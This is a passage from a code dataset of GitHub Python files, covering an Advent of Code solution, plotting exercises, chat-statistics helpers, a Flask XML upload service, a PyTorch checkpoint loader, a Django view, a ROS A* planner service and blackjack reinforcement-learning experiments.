os.path.splitext(os.path.basename(__file__))\n# f = open(f\"{file}sample.txt\", \"r\")\nf = open(f\"{file}.txt\", \"r\")\nlines = []\nfor rawline in f:\n line = str.strip(rawline)\n lines.append(line)\n\n\n\ninputs = []\nmaxval = 0\nfor line in lines:\n parts = line.split(\" -> \")\n parta = parts[0].split(\",\")\n partb = parts[1].split(\",\")\n xa = int(parta[0])\n ya = int(parta[1])\n xb = int(partb[0])\n yb = int(partb[1])\n inputs.append(((xa,ya), (xb, yb)))\n maxval = max(maxval, xa, ya, xb, yb)\n\nmaxval += 1\nboard = []\nfor y in range(maxval):\n board.append([])\n for x in range(maxval):\n board[y].append(0)\n\ncount = 0\n\nfor input in inputs:\n # if input[0][0] != input[1][0] and input[0][1] != input[1][1]:\n # continue\n print(input)\n ystep = 1\n xstep = 1\n if input[0][0] == input[1][0]:\n x = input[0][0]\n yfrom = input[0][1]\n yto = 
input[1][1]\n ystep = 1 if yfrom < yto else -1\n yto += ystep\n print(f'[{x}][{yfrom},{yto},{ystep}]')\n for y in range(yfrom,yto,ystep):\n board[y][x] += 1\n if board[y][x] == 2:\n count += 1;\n\n\n elif input[0][1] == input[1][1]:\n y = input[0][1]\n xfrom = input[0][0]\n xto = input[1][0]\n xstep = 1 if xfrom < xto else -1\n xto += xstep\n print(f'[{xfrom},{xto},{xstep}][{y}')\n for x in range(xfrom,xto,xstep):\n board[y][x] += 1\n if board[y][x] == 2:\n count += 1;\n else:\n xfrom = input[0][0]\n xto = input[1][0]\n xstep = 1 if xfrom < xto else -1\n xto += xstep\n\n yfrom = input[0][1]\n yto = input[1][1]\n ystep = 1 if yfrom < yto else -1\n yto += ystep\n y = yfrom\n\n print(f'[{xfrom, xto, xstep}][{yfrom},{yto},{ystep}]')\n\n for x in range(xfrom, xto, xstep):\n board[y][x] += 1\n if board[y][x] == 2:\n count += 1;\n y += ystep\n\nfor b in board:\n print(b)\nprint(count)","repo_name":"blanchg/aoc2021","sub_path":"5a.py","file_name":"5a.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36093090101","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 10 11:43:00 2020\r\n绘图1\r\n@author: kanwa\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# 画一条直线,y轴的数值指定,x轴的数值matplotlib指定,从0开始[0,1,2,3]\r\nplt.plot([1, 2, 3, 4])\r\nplt.ylabel('some numbers')\r\nplt.show()\r\n\r\nplt.plot([1, 2, 3, 4],[1, 2, 3, 4])\r\nplt.ylabel('some numbers')\r\nplt.xlabel('some nmbers')\r\nplt.show()\r\n# axis()[x坐标最小值,x坐标最大值,y坐标最小值,y坐标最大值]\r\nplt.plot([1, 2, 3, 4], [1, 4, 9, 16], 'ro')\r\nplt.axis([0, 6, 0, 20])\r\nplt.show()\r\n\r\n# sin函数\r\nx = np.arange(0, 8, 0.1);\r\ny = np.sin(x)\r\nplt.plot(x, y)\r\n\r\n\r\n# 举例\r\nexcelDataset = pd.read_excel(r'.\\data\\ScoresofStudents1.xlsx',sheet_name = None)\r\nscores2018_1 = excelDataset[list(excelDataset.keys())[1]]\r\nscores2018_2 = excelDataset[list(excelDataset.keys())[2]]\r\nplt.plot(scores2018_1['Scores'], 'ro')\r\nplt.plot(scores2018_2['studentsOfScores'], 'g.')\r\nplt.plot(scores2018_1['Scores'], 'r--')\r\n\r\n# 课程平均成绩bar\r\nsubjectsScores = scores2018_1.groupby('CourseID')['Scores'].mean()\r\nlabels = list(subjectsScores.index)\r\nplt.bar(labels,subjectsScores.values)\r\n","repo_name":"andrewkan1/pythonbasement","sub_path":"102 Pandas-DataFrame-40.py","file_name":"102 Pandas-DataFrame-40.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15148725831","text":"import matplotlib.pyplot as plt\r\nfrom wordcloud import WordCloud, STOPWORDS\r\nfrom neattext import TextExtractor\r\nfrom collections import Counter\r\nimport pandas as pd\r\nimport emoji\r\nimport plotly.express as px\r\n\r\n\r\ndef fetch_stats(user, df):\r\n if user != 'overall':\r\n df = df[df['user'] == user]\r\n num_messages = df.shape[0]\r\n\r\n\r\n media_msg = df[df['messages'].str.contains('image omitted|Image Omitted') | df['messages'].str.contains(\r\n 'media omitted|Media omitted')].shape[0]\r\n words = []\r\n for message in df['messages']:\r\n words.extend(message.split())\r\n\r\n\r\n emojis = []\r\n for message in df['messages']:\r\n sent = TextExtractor(message)\r\n\r\n emojis.append(sent.extract_emojis())\r\n\r\n df['emojis'] = emojis\r\n emojis_sent = sum(df['emojis'].str.len())\r\n\r\n return num_messages, len(words), media_msg, emojis_sent\r\n\r\n\r\ndef most_busy_users(df):\r\n all_users = 
len(df['user'].unique())\r\n    top_msg = df.groupby('user')['messages'].count().sort_values(ascending=False).head(10).reset_index()\r\n    top_user = top_msg['user'][0]\r\n    msg_top_sent = top_msg['messages'][0]\r\n    average_msgs = len(df['messages'])/len(df['user'].unique())\r\n    return top_user, all_users, msg_top_sent, top_msg, average_msgs\r\n\r\ndef emoji_helper(user, df):\r\n    if user != 'overall':\r\n        df = df[df['user'] == user]\r\n    emojis = []\r\n    for message in df['messages']:\r\n        emojis.extend([c for c in message if c in emoji.UNICODE_EMOJI['en']])\r\n    emoji_df = pd.DataFrame(Counter(emojis).most_common(20))\r\n    emoji_df.columns = ['emoji', 'count']\r\n    most_common_emoji = emoji_df['emoji'][0]\r\n    len_most_common = emoji_df['count'][0]\r\n    unique_emojis = len(emoji_df['emoji'].unique())\r\n\r\n    em = emoji_df.head(5)\r\n    return most_common_emoji, unique_emojis, em, len_most_common\r\n\r\ndef monthly_weekly_time(user, df):\r\n    if user != 'overall':\r\n        df = df[df['user'] == user]\r\n    weekly = df.groupby('weekname')['messages'].size().reset_index().sort_values(by='messages', ascending=False).reset_index()\r\n    hourly = df.groupby('hour')['messages'].count().reset_index().sort_values(by='messages', ascending=False).reset_index()\r\n    hours_p = []\r\n    for h in hourly['hour']:\r\n        if h > 12:\r\n            hours_p.append(str(h - 12) + \" \" + \"PM\")\r\n        else:\r\n            hours_p.append(str(h) + \" \" + \"AM\")\r\n    hourly['hours_p'] = hours_p\r\n    hourly[['hours_p', 'messages']]\r\n    return hourly, weekly\r\n\r\n\r\ndef timeline_chart(user, df):\r\n    if user != 'overall':\r\n        df = df[df['user'] == user]\r\n    timeline = df.groupby(['year', 'month']).size().reset_index(name='count')\r\n    year_month = []\r\n    for i in range(timeline.shape[0]):\r\n        year_month.append(timeline['month'][i] + \"-\" + str(timeline['year'][i]))\r\n    timeline['time'] = year_month\r\n    return timeline\r\n\r\ndef create_wordcloud(user, df):\r\n    if user != 'overall':\r\n        df = df[df['user'] == user]\r\n    wc = WordCloud(stopwords=STOPWORDS, width=500, height=500, min_font_size=10, background_color='white')\r\n    df_wc = wc.generate(df['messages'].str.cat(sep=' '))\r\n\r\n    return df_wc\r\n","repo_name":"rohan-kusuma/WhatsappAnalyzer","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"15468295076","text":"from flask import Flask, request, jsonify, Response\nimport xml.etree.ElementTree as ET\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n# In-memory storage for the messages processed from the XML uploads\nmessages_data = []\nmessages_data2 = []\n\n@app.route('/grabarMensaje', methods=['POST'])\ndef grabar_mensaje():\n    if 'file' not in request.files:\n        return jsonify({\n            \"message\": \"No se ha enviado un archivo, intente de nuevo\"\n        })\n\n    file = request.files['file']\n    file_contents = file.read().decode('utf-8')\n\n    # Parse the XML file and extract the required fields\n    root = ET.fromstring(file_contents)\n    fecha = root.find('TIEMPO/FECHA').text.strip()\n    msj_recibidos = root.find('TIEMPO/MSJ_RECIBIDOS').text.strip()\n    usr_mencionados = root.find('TIEMPO/USR_MENCIONADOS').text.strip()\n    hash_incluidos = root.find('TIEMPO/HASH_INCLUIDOS').text.strip()\n\n    # Store the extracted fields in a dictionary\n    message_info = {\n        \"FECHA\": fecha,\n        \"MSJ_RECIBIDOS\": msj_recibidos,\n        \"USR_MENCIONADOS\": usr_mencionados,\n        \"HASH_INCLUIDOS\": hash_incluidos\n    }\n\n    # Append the entry to the message log\n    messages_data.append(message_info)\n\n    return jsonify({\n        \"message\": \"El mensaje fue grabado con éxito\"\n    })\n\n@app.route('/grabarConfiguracion', methods=['POST'])\ndef grabar_configuracion():\n    if 'file' not in request.files:\n        return jsonify({\n            \"message\": \"No se ha enviado un archivo, intente de nuevo\"\n        })\n    file = request.files['file']\n    file_contents = file.read().decode('utf-8')\n\n    # Parse the XML file and store the data in a dictionary\n    config_data = {}\n    root = ET.fromstring(file_contents)\n\n    # Walk the sections of the XML file\n    for section in root:\n        section_name = section.tag\n        config_data[section_name] = {}\n\n        for word_element in section:\n            word = word_element.text.strip()\n            count = len(list(word_element))\n            config_data[section_name][word] = count\n\n    # Append the entry to the configuration log\n    messages_data2.append(config_data)\n\n    return jsonify({\n        \"message\": \"La configuración del servidor fue grabada con éxito\"\n    })\n\n\n\n@app.route('/limpiarDatos', methods=['POST'])\ndef limpiar_datos():\n    messages_data.clear()\n    messages_data2.clear()\n    return jsonify({\"message\": \"Datos limpiados exitosamente\"})\n\n\n@app.route('/devolverHashtags', methods=['GET'])\ndef devolver_hashtags():\n    # Build an XML element from the entries stored in messages_data\n    xml_response = ET.Element(\"MENSAJES_RECIBIDOS\")\n    for message_info in messages_data:\n        tiempo = ET.SubElement(xml_response, \"TIEMPO\")\n        fecha = ET.SubElement(tiempo, \"FECHA\")\n        fecha.text = message_info[\"FECHA\"]\n        msj_recibidos = ET.SubElement(tiempo, \"MSJ_RECIBIDOS\")\n        msj_recibidos.text = message_info[\"MSJ_RECIBIDOS\"]\n        usr_mencionados = ET.SubElement(tiempo, \"USR_MENCIONADOS\")\n        usr_mencionados.text = message_info[\"USR_MENCIONADOS\"]\n        hash_incluidos = ET.SubElement(tiempo, \"HASH_INCLUIDOS\")\n        hash_incluidos.text = message_info[\"HASH_INCLUIDOS\"]\n\n    # Serialize the XML response\n    response = ET.tostring(xml_response, encoding=\"utf-8\")\n    return Response(response, content_type='application/xml')\n\n\n@app.route('/devolverMenciones', methods=['GET'])\ndef devolver_menciones():\n    if not messages_data2:\n        return jsonify({\"menciones\": \"No hay datos de configuración almacenados\"})\n\n    word_counts = {}\n    xml_response = ET.Element(\"CONFIG_RECIBIDA\")\n\n    for section_name, words in messages_data2[-1].items():\n        section = ET.Element(section_name)\n        section_words = set()  # use a set to avoid duplicates in the output\n        for word in words:\n            if word not in section_words:\n                section_words.add(word)\n                word_counts[word] = word_counts.get(word, 0) + 1\n                word_element = ET.Element(\"palabra\")\n                word_element.text = word\n                section.append(word_element)\n        xml_response.append(section)\n\n    for word, count in word_counts.items():\n        section = ET.Element(\"conteo_\" + word)\n        palabra_element = ET.Element(\"palabra\")\n        palabra_element.text = word\n        section.append(palabra_element)\n        conteo_element = ET.Element(\"conteo\")\n        conteo_element.text = str(count)\n        section.append(conteo_element)\n        xml_response.append(section)\n\n    response = ET.tostring(xml_response, encoding=\"utf-8\")\n    return Response(response, content_type='application/xml')\n\n\n\n\n\nif __name__ == '__main__':\n    app.run(debug=True)","repo_name":"frandergomez/IPC2_Proyecto3_201901371","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
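A quick client-side sketch of how the Flask endpoints above could be exercised (hypothetical: the host/port and the MENSAJES root tag are assumptions; grabar_mensaje() only requires a TIEMPO child holding the four fields):
import requests  # any HTTP client works; requests is assumed here
xml_payload = b"<MENSAJES><TIEMPO><FECHA>01/01/2023</FECHA><MSJ_RECIBIDOS>10</MSJ_RECIBIDOS><USR_MENCIONADOS>4</USR_MENCIONADOS><HASH_INCLUIDOS>2</HASH_INCLUIDOS></TIEMPO></MENSAJES>"
base = "http://127.0.0.1:5000"  # Flask's default dev address (assumption)
requests.post(f"{base}/grabarMensaje", files={"file": ("msg.xml", xml_payload)})  # upload one message file
print(requests.get(f"{base}/devolverHashtags").text)  # aggregated XML comes back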
+{"seq_id":"18818286709","text":"#!/usr/bin/env python\n# coding: utf-8\n#\n# Author: speedinghzl\n# URL: https://github.com/speedinghzl/pytorch-segmentation-toolbox\n\nimport time\nimport logging\n\nimport torch\nimport torch.nn as nn\n\nfrom .logger import get_logger\n\n\n\nlogger = get_logger()\n\n\"\"\"def init_layer(key):\n    # Initialize the layer (not covered by pretraining/fine-tuning)\n    if key.split('.')[-1] == 'weight':\n        if 'conv' in key:\n            if self.state_dict()[key].ndimension() >= 2:\n                nn.init.kaiming_normal_(self.state_dict()[key], mode='fan_out', nonlinearity='relu')\n        elif 'bn' in key:\n            self.state_dict()[key][...] = 1\n    elif key.split('.')[-1] == 'bias':\n        self.state_dict()[key][...] = 0.001\"\"\"\n\ndef weight_init(self):\n    if isinstance(self, nn.Conv3d):\n        #nn.init.kaiming_normal_(self.weight.data, mode='fan_out', nonlinearity='relu')\n        nn.init.xavier_normal_(self.weight.data, gain=0.01)\n        #nn.init.normal_(self.weight.data, mean=0, std=0.01)\n        nn.init.constant_(self.bias.data, 0)\n    elif isinstance(self, nn.BatchNorm2d):\n        self.weight.data.fill_(1)\n        self.bias.data.zero_()\n\ndef load_model(model, model_file, is_restore=False):\n    t_start = time.time()\n    if isinstance(model_file, str):\n        device = torch.device('cpu')\n        state_dict = torch.load(model_file, map_location=device)\n        if 'state_dict' in state_dict.keys():\n            state_dict = state_dict['state_dict']\n    else:\n        state_dict = model_file\n    t_ioend = time.time()\n\n    if not is_restore:\n        # extend the input channels of FGPLG from 3 to 7\n        v2 = model.backbone.resnet.conv1.weight\n        if v2.size(1) > 3:\n            v = state_dict['backbone.resnet.conv1.weight']\n            v = torch.cat((v, v2[:, 3:, :, :]), dim=1)\n            state_dict['backbone.resnet.conv1.weight'] = v\n\n    model.load_state_dict(state_dict, strict=False)\n    ckpt_keys = set(state_dict.keys())\n    own_keys = set(model.state_dict().keys())\n    missing_keys = own_keys - ckpt_keys\n    unexpected_keys = ckpt_keys - own_keys\n\n\n    for k in missing_keys:\n        # NOTE: k is a parameter-name string, so the isinstance checks inside\n        # weight_init never match and this call is effectively a no-op;\n        # weight_init expects a module (e.g. applied via model.apply(weight_init))\n        weight_init(k)\n\n\n    if len(missing_keys) > 0:\n        logger.warning('Missing key(s) in state_dict: {}'.format(\n            ', '.join('{}'.format(k) for k in missing_keys)))\n\n    if len(unexpected_keys) > 0:\n        logger.warning('Unexpected key(s) in state_dict: {}'.format(\n            ', '.join('{}'.format(k) for k in unexpected_keys)))\n\n    del state_dict\n    t_end = time.time()\n    logger.info(\n        \"Load model, Time usage:\\n\\tIO: {}, initialize parameters: {}\".format(\n            t_ioend - t_start, t_end - t_ioend))\n\n    return model","repo_name":"ELOESZHANG/FANet","sub_path":"network/libs/utils/pyt_utils.py","file_name":"pyt_utils.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"37361473457","text":"import json\n\nfrom django.views.generic import TemplateView\n\nfrom .models import Country\n\n# Countries Data:\n# https://github.com/SmileyChris/django-countries/blob/master/django_countries/data.py#L45\n\n\nclass HomeView(TemplateView):\n    template_name = \"base.html\"\n\n    def get_context_data(self, **kwargs):\n        context = super(HomeView, self).get_context_data(**kwargs)\n        countries = Country.objects.filter(population__isnull=False)\n\n        podcasts_per_captia_data = {\n            c.code: c.podcasts_per_captia() for c in countries}\n        population_data = {c.code: c.intword_population for c in countries}\n        podcasts_data = {c.code: c.podcasts_count for c in countries}\n\n        context[\"podcasts_per_captia_data\"] = json.dumps(\n            podcasts_per_captia_data)\n        context[\"podcasts_data\"] = json.dumps(podcasts_data)\n        context[\"population_data\"] = json.dumps(population_data)\n        
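# (added note) each blob maps a country code to a single metric, serialized for the template to consume\n        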
context[\"countries\"] = countries\n return context\n","repo_name":"team-i18n/hackaway","sub_path":"teami18n/teami18n/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38292530813","text":"#!/usr/bin/env python3\nimport heapq\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport rospy\nfrom math import sqrt\nfrom geometry_msgs.msg import Point\nfrom nav_msgs.msg import OccupancyGrid\nfrom planner.srv import astar, astarResponse\n\nshow_animation = True\nclass Astar:\n def __init__(self, resolution, world_min_x, world_min_y, obstacle_map, x_width, y_width):\n # world_min_x, world_min_y are the minimum x and y co-ordinates of the world.\n # x_width and y_width are the dimensions of the map.\n self.resolution = resolution\n self.world_min_x, self.world_min_y = world_min_x, world_min_y\n self.obstacle_map = obstacle_map\n self.x_width, self.y_width = x_width, y_width\n\n class Node:\n def __init__(self, x, y, cost, parent_node, processed):\n self.x = x # index of grid\n self.y = y # index of grid\n self.cost = cost\n self.parent = parent_node\n self.processed = processed\n \n @classmethod\n def from_tuple(cls, t):\n x, y = t\n return cls(x, y, float(\"inf\"), None, False)\n\n def __str__(self):\n return (\n str(self.x)\n + \",\"\n + str(self.y)\n + \",\"\n + str(self.cost)\n + \",\"\n + str(self.parent)\n )\n\n def calc_grid_position(self, index, min_position):\n \"\"\"\n Given an index, it calculates the position of the grid in the world coordinate frame\n\n index: this maybe the x or y coordinate\n min_position: pass the min_x or min_y accordingly\n return: actual position of the grid in the world frame\n \"\"\"\n pos = index * self.resolution + min_position\n return pos\n\n def calc_xy_index(self, position, min_pos):\n \"\"\"\n calculates the index of the grid cell where the given position lies\n position: position in the world frame (again maybe x or y coordinate)\n min_pos: pass the min_x or min_y accordingly\n \"\"\"\n return round((position - min_pos) / self.resolution)\n\n def return_cost(self, t1, t2):\n x1, y1 = t1\n x2, y2 = t2\n\n # Taking max since the grids with uncertainity are -1, so avoiding negative weights\n t = max(self.obstacle_map[int(y1)][int(x1)], 0) + max(self.obstacle_map[int(y2)][int(x2)], 0)\n if t >= 80:\n t = float(\"inf\")\n return t\n else:\n return self.distance(t1, t2)\n\n def distance(self, current_node, node2):\n \"\"\"\n This returns the euclidian distance between two nodes.\n \"\"\"\n x, y = current_node\n x1, y1 = node2\n\n # euclidian distance\n return sqrt((x-x1)**2 + (y-y1)**2)\n\n def calc_heuristic(self, current_node, node2):\n \"\"\"\n This is the heuristic function for A*.\n Diagonal Distance Heuristic is used.\n \"\"\"\n x, y = current_node\n x1, y1 = node2\n\n dx = abs(x - x1)\n dy = abs(y - y1)\n\n h = (dx + dy) + (sqrt(2) - 2) * min(dx, dy)\n return h\n\n def return_neighbours(self, current_node):\n \"\"\"\n Returns : List containing the neighbours of the current node (as tuples).\n \"\"\"\n l = []\n x, y = current_node\n x_minus = x - 1\n y_minus = y - 1\n x_plus = x + 1\n y_plus = y + 1\n\n max_x = self.x_width\n min_x = 0\n min_y = 0\n max_y = self.y_width\n\n if x_plus < max_x:\n l.append((x_plus, y))\n\n if y_plus < max_y:\n l.append((x_plus, y_plus))\n\n if y_minus >= min_y:\n l.append((x_plus, y_minus))\n\n if x_minus >= min_x:\n l.append((x_minus, y))\n\n if y_plus < max_y:\n 
l.append((x_minus, y_plus))\n\n if y_minus >= min_y:\n l.append((x_minus, y_minus))\n\n if y_plus < max_y:\n l.append((x, y_plus))\n\n if y_minus >= min_y:\n l.append((x, y_minus))\n\n return l\n\n def plan(self, sx, sy, gx, gy):\n pq = [] # this is the list which we are going to use as a priority queue\n rx = []\n ry = []\n reached = {}\n # converting the positions into indices of the grid\n sx, sy = self.calc_xy_index(sx, self.world_min_x), self.calc_xy_index(sy, self.world_min_y)\n gx, gy = self.calc_xy_index(gx, self.world_min_x), self.calc_xy_index(gy, self.world_min_y)\n start = (sx, sy)\n goal = (gx, gy)\n\n heapq.heappush(\n pq, (0.0 + self.distance(start, goal), start)\n ) # similar to pq.push() in c++\n\n start_node = self.Node(sx, sy, 0.0, None, False)\n reached[start] = start_node\n iterations = 0 # to keep track of total number of iterations.\n\n while len(pq) > 0:\n iterations += 1\n d, t = heapq.heappop(pq)\n if (\n reached[t].processed == True\n ): # if node is processed no need to iterate this node\n continue\n\n reached[t].processed = True\n # if show_animation: # pragma: no cover\n # plt.plot(\n # self.calc_grid_position(reached[t].x, self.world_min_x),\n # self.calc_grid_position(reached[t].y, self.world_min_y),\n # \"xc\",\n # )\n # plt.pause(0.001)\n\n if (\n t == goal\n ): # if goal is reached, backtrack all nodes from goal upto parent\n print(\"goal reached!\")\n node = reached[goal]\n while not (node == None):\n rx.append(self.calc_grid_position(node.x, self.world_min_x))\n ry.append(self.calc_grid_position(node.y, self.world_min_y))\n node = node.parent\n rx.reverse()\n ry.reverse()\n return True, rx, ry\n\n l = self.return_neighbours(t)\n for tup in l:\n if (\n reached.get(tup) == None\n ): # object does not exist, so creating an object here\n n = self.Node.from_tuple(tup)\n n.cost = reached[t].cost + self.return_cost(t, tup)\n n.parent = reached[t]\n reached[tup] = n\n heapq.heappush(pq, (n.cost + self.calc_heuristic(tup, goal), tup))\n \n elif (\n reached[t].cost + self.return_cost(t, tup)< reached[tup].cost\n ): # In this case object already exists, so just update the values\n n = reached[tup]\n n.cost = reached[t].cost + self.return_cost(t, tup)\n n.parent = reached[t]\n reached[tup] = n\n heapq.heappush(pq, (n.cost + self.calc_heuristic(tup, goal), tup))\n\n if iterations > 5000: # Just to ensure we don't go in an infinite loop\n print(\"goal not reached\")\n return False, [], []\n\n\n\n\ndef main_planner(request):\n global show_animation\n print(\"in main planner\")\n # initialize variables\n obstacle_map = OccupancyGrid()\n start_point = Point()\n goal_point = Point()\n\n # extract data from request\n obstacle_map = request.obstacle_map\n start_point = request.start_pos\n goal_point = request.goal_pos\n\n # extract map parameters\n map_width = obstacle_map.info.width\n map_height = obstacle_map.info.height\n map_data = obstacle_map.data\n map_resolution = obstacle_map.info.resolution\n # x and y coordinates of the cell (0,0) of map in the real world\n map_origin_x = obstacle_map.info.origin.position.x\n map_origin_y = obstacle_map.info.origin.position.y\n\n # set start and goal position\n sx = start_point.x\n sy = start_point.y\n gx = goal_point.x\n gy = goal_point.y\n\n ox, oy = [], []\n print(1)\n map_data = np.array(map_data, dtype=np.int32)\n\n map_data = map_data.reshape((map_height, map_width))\n temp = np.where(map_data==100)\n tempx = temp[0]\n tempy = temp[1]\n # l = [\n # (i, j)\n # for i in range(map_height)\n # for j in range(map_width)\n # if 
map_data[i, j] == 100\n    # ]\n\n    # for i in range(map_width):\n    #     for j in range(map_height):\n    #         if map_data[j][i] >= 50:\n    #             oy.append((float(i) * map_resolution) + map_origin_x)#ox\n    #             ox.append((float(j) * map_resolution) + map_origin_y)#oy\n    #             print(\"still forring\"+str(i))\n    # if show_animation:\n    #     plt.plot(oy, ox, \".k\")#ox,oy\n    #     plt.plot(sx, sy, \"og\")# sx,sy\n    #     plt.plot(gx, gy, \"xb\")# gx,gy\n    #     plt.grid(True)\n    #     plt.axis(\"equal\")\n    #     plt.pause(0.001)\n    '''\n    The nxt part of the code is meant for easier path tracking. Each obstacle is enhanced to the \n    size of the bot_radius. This is done to ensure that if the bot travels on the path returned by the\n    planner it does not collide with the obstacles.\n    '''\n\n    # radius of the bot in world frame.\n    bot_radius = 0.225\n    # radius of the bot in map frame. \n    map_bot_radius = int(round(bot_radius / map_resolution))\n    #print(l)\n\n    # #enhance obstacles \n    # #gox = 1.7\n    # #goy = 0\n    # #sx = -2\n    # #sy = 0\n    # #m = ((gy-sy)/(gx-sx))\n    # #c = gy-m*gx\n    # #c1 = c - (map_bot_radius)*((sqrt(1+m*m)))\n    # #c2 = c + (map_bot_radius)*((sqrt(1+m*m)))\n    # #print('start')\n    # #print(l)\n\n    print(2)\n    for cx, cy in list(zip(tempx, tempy)): \n        #c0 = cy - m*cx\n        #if ((cx>-2) and (cx<1.7) and (y<0.75) and (cy>-0.75)):\n           # print('hi')\n        map_data = cv2.circle(map_data, (cy, cx), map_bot_radius, 100, -1) \n    print('end')\n    print(map_data)\n    '''\n    This part makes space around the goal empty for the planner. It is possible that the goal is very near\n    to an obstacle it lies within bot_radius [m] of the obstacle. In this case A* wil fail to return a path \n    although one exists. Hence, the obstacles within bot_radius [m] of the goal are removed.\n    '''\n    print(3)\n    map_data = cv2.circle(\n        map_data, \n        (int(round((gx - map_origin_x) / map_resolution)), # map co-ordinate of goal_x\n        int(round((gy - map_origin_y) / map_resolution))), # map co-ordinate of goal_y\n        map_bot_radius,\n        0, \n        -1\n    )\n    print(\"tryig a* now\")\n    # try:\n    a_star = Astar(\n        map_resolution, \n        map_origin_x, \n        map_origin_y,\n        map_data, \n        map_width, \n        map_height\n    )\n    status, trajectory_x, trajectory_y = a_star.plan(sx, sy, gx, gy)\n    print(\"a* done\")\n    # if show_animation and status:\n    #     plt.plot(trajectory_x, trajectory_y, \"-r\")\n    #     plt.show()\n    # plt.plot(trajectory_x, trajectory_y, \"-r\")\n    # plt.show()\n    print(\"returning\")\n    return astarResponse(status, trajectory_x, trajectory_y) \n    \n    # except Exception as e:\n    #     trajectory_x, trajectory_y = [], []\n    #     print(\"Planner failed to find a path!:\", str(e))\n    #     return astarResponse(False, trajectory_x, trajectory_y)\n    \ndef astar_server():\n    rospy.init_node('astar_server')\n    s = rospy.Service('astar_planner', astar, main_planner)\n    print(\"Ready to plan using A*.\")\n    rospy.spin()\n\nif __name__ == \"__main__\":\n    while not rospy.is_shutdown():\n        astar_server()\n    ","repo_name":"AtharvMane/planner_cpp","sub_path":"scripts/astar_service.py","file_name":"astar_service.py","file_ext":"py","file_size_in_byte":11536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12916665988","text":"from typing import Tuple\nimport numpy as np\nimport numpy.typing as npt\nimport matplotlib.pyplot as plt\ndef value_iteration(\n    V0: npt.NDArray, \n    lr: float, \n    gamma:float, \n    epsilon: float=1e-12\n    ) -> npt.NDArray:\n    \n    Vstar = np.copy(V0)\n    while True:\n        for i in range(22):\n            Vdraw = 0\n            for x in range(1, 11):\n                pr = 1.0 if x != 10 else 4.0\n                val = 0 if i+x > 21 else V0[i+x]\n                
Vdraw += pr/13.0 * (lr + gamma * val)\n Vstop = i\n Vstar[i] = max(Vdraw, Vstop)\n if np.amax(Vstar - V0) <= epsilon:\n break \n V0 = np.copy(Vstar)\n \n return Vstar\ndef value_to_policy(V: npt.NDArray, lr: float, gamma: float) -> npt.NDArray:\n pstar = np.zeros(V.size)\n for i in range(22):\n Vdraw = 0\n for x in range(1, 11):\n pr = 1.0 if x != 10 else 4.0\n val = 0 if i+x > 21 else V[i+x]\n Vdraw += pr/13.0 * (lr + gamma * val)\n Vstop = i\n pstar[i] = 1 if Vdraw > Vstop else 0\n return pstar\n\ndef draw() -> int:\n probs = 1/13*np.ones(10)\n probs[-1] *= 4\n return np.random.choice(np.arange(1,11), p=probs)\n\ndef Qlearn(\n Q0: npt.NDArray, \n lr: float, \n gamma: float, \n alpha: float, \n epsilon: float, \n N: int\n ) -> Tuple[npt.NDArray, npt.NDArray]:\n\n Q0[0, 1] = 1\n cur = 0\n record = np.zeros((N,3))\n for i in range(N):\n rand = np.random.random()\n action = np.argmax(Q0[cur])\n\n if rand < epsilon: # explore\n action = abs(action-1)\n \n\n\n if action == 1: # draw\n x = draw()\n next_val = 0 if cur + x > 21 else np.max(Q0[cur + x])\n reward = 0 if cur + x > 21 else lr\n Q0[cur, action] = Q0[cur, action] + alpha * (lr + gamma * next_val - Q0[cur, action])\n cur = 0 if cur + x > 21 else cur + x\n else: # stop\n reward = cur\n Q0[cur, action] = Q0[cur, action] + alpha * (cur + gamma * 0 - Q0[cur, action])\n cur = 0\n record[i][0] = cur\n record[i][1] = action\n record[i][2] = reward\n\n return Q0, record\n\ndef RL_analysis():\n lr, gamma, alpha, epsilon, N = 0, 1, 0.1, 0.1, 10000\n visits = np.zeros((22,6))\n rewards = np.zeros((N,6))\n values = np.zeros((22,6))\n\n for i in range(6):\n _, record = Qlearn(np.zeros((22,2)), lr, gamma, alpha, epsilon, 10000*i)\n vals, counts = np.unique(record[:,0], return_counts=True)\n visits[vals.astype(int),i] = counts\n _, record = Qlearn(np.zeros((22,2)), lr, gamma, alpha, 0.2*i, N)\n rewards[:,i] = record[:,2]\n vals, _ = Qlearn(np.zeros((22,2)), lr, gamma, min(0.2*i+0.1,1), epsilon, N)\n values[:,i] = np.max(vals, axis=1)\n \n plt.figure()\n plt.plot(visits)\n plt.legend(['N=0', 'N=10k', 'N=20k', 'N=30k' ,'N=40k', 'N=50k'])\n plt.title('Number of visits to each state')\n\n plt.figure()\n plt.plot(np.cumsum(rewards, axis=0))\n plt.legend(['e=0.0', 'e=0.2', 'e=0.4' ,'e=0.6', 'e=0.8', 'e=1.0'])\n plt.title('Cumulative rewards received')\n\n plt.figure()\n plt.plot(values)\n plt.legend(['a=0.1' ,'a=0.3', 'a=0.5', 'a=0.7', 'a=0.9', 'a=1.0'])\n plt.title('Estimated state values')\n\nif __name__ == \"__main__\":\n # Vstar = value_iteration(np.zeros(22), 0, 1)\n # plt.figure()\n # plt.plot(Vstar)\n # plt.title(\"Value*\")\n\n # Pstar = value_to_policy(Vstar, 0, 1)\n # plt.figure()\n # plt.plot(Pstar)\n # plt.title(\"Policy*\")\n\n # Vstar = 